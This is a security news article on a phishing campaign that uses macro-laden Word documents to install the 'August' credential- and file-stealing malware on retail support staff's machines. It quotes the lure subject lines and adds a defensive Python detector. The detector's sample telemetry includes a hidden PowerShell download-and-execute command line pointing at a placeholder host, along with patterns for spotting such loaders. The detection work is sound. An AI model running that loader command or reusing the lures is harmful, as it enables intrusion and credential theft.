A new malware-laden phishing campaign has been found targeting retailers’ customer service representatives and managerial staff, researchers warned.
According to cybersecurity firm Proofpoint, the campaign leverages a relatively new malware – dubbed ‘August’ – capable of stealing credentials and sensitive documents from the infected computer.
Researchers explained that the attack is carried out via a highly personalized email carrying a Word document whose macros download and install the malware.
“During our analysis, we found that many of the lures and subject lines of the emails used references to issues with supported purchases on the company’s website and were targeted at individuals who may be able to provide support for those issues,” said Proofpoint.
The attackers use subject lines that include the recipient’s domain, such as:
- Erroneous charges from [recipient’s domain]
- [recipient’s domain] – Help: Items vanish from the cart before checkout
- [recipient’s domain] Support: Products disappear from the cart during checkout
- Need help with order on [recipient’s domain]
- Duplicate charges on [recipient’s domain]
Once the malware is installed, researchers determined, August is capable of stealing files with specific extensions and uploading them to a command-and-control (C&C) server, grabbing credentials, checking for the presence of common security tools, and using simple encryption.
“The malware itself is obfuscated while the macro used in these distribution campaigns employs a number of evasion techniques and a fileless approach to load the malware via PowerShell,” the researchers noted.
“All of these factors increase the difficulty of detection, both at the gateway and the endpoint,” said Proofpoint.
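Endpoint detection logic for the macro-to-PowerShell loading step described above, as an added example that is not Proofpoint's code or anything from the original article. The event records are constructed and loosely shaped like Windows process-creation telemetry; the indicator patterns are assumptions about what a hidden, fileless PowerShell loader command line typically looks like, not indicators from this campaign.

```python
import json
import re

# Constructed sample events (JSON lines), not real telemetry from this campaign.
# Fields mimic common process-creation logging: parent image, child image, command line, user.
SAMPLE_EVENTS = r"""
{"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoP -W Hidden -Enc SQBFAFgA", "User": "SHOP\\support01"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -File C:\\Scripts\\inventory.ps1", "User": "SHOP\\admin"}
{"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"", "User": "SHOP\\support02"}
{"ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "Image": "C:\\Windows\\splwow64.exe", "CommandLine": "splwow64.exe 12288", "User": "SHOP\\support01"}
"""

# Office applications that should almost never spawn a PowerShell host on a service desk workstation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe"}

# Assumed command-line traits of a fileless loader: hidden window, encoded command,
# in-memory download-and-execute, profile suppression. Each adds one reason to the alert.
SUSPICIOUS_ARGS = [
    re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    re.compile(r"-(?:e|enc|encodedcommand)\s", re.I),
    re.compile(r"downloadstring|downloadfile|\biex\b|invoke-expression", re.I),
    re.compile(r"-(?:nop|noprofile)\b", re.I),
]


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the reasons an event looks like an Office macro launching a PowerShell loader (empty if benign)."""
    reasons = []
    if basename(ev["ParentImage"]) in OFFICE_PARENTS and basename(ev["Image"]) in POWERSHELL_HOSTS:
        reasons.append("office-parent->powershell")
        for rx in SUSPICIOUS_ARGS:
            if rx.search(ev.get("CommandLine", "")):
                reasons.append(rx.pattern)
    return reasons


def detect(jsonl):
    """Run score_event over JSON-lines telemetry; return (user, parent, reasons) per flagged event."""
    alerts = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        reasons = score_event(ev)
        if reasons:
            alerts.append((ev["User"], basename(ev["ParentImage"]), reasons))
    return alerts


if __name__ == "__main__":
    for user, parent, reasons in detect(SAMPLE_EVENTS):
        print(f"ALERT user={user} parent={parent} reasons={reasons}")
```

The parent-child relationship alone is the high-signal part; the command-line traits only rank the alert, since an obfuscated macro can vary them freely.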
Based on their investigation, researchers said the campaign appears to be linked to TA530, an actor or cybercrime group Proofpoint has previously cited for its highly personalized campaigns.
“While this actor is largely targeting retailers and manufacturers with large B2C sales operations, August could be used to steal credentials and files in a wide range of scenarios,” warned Proofpoint.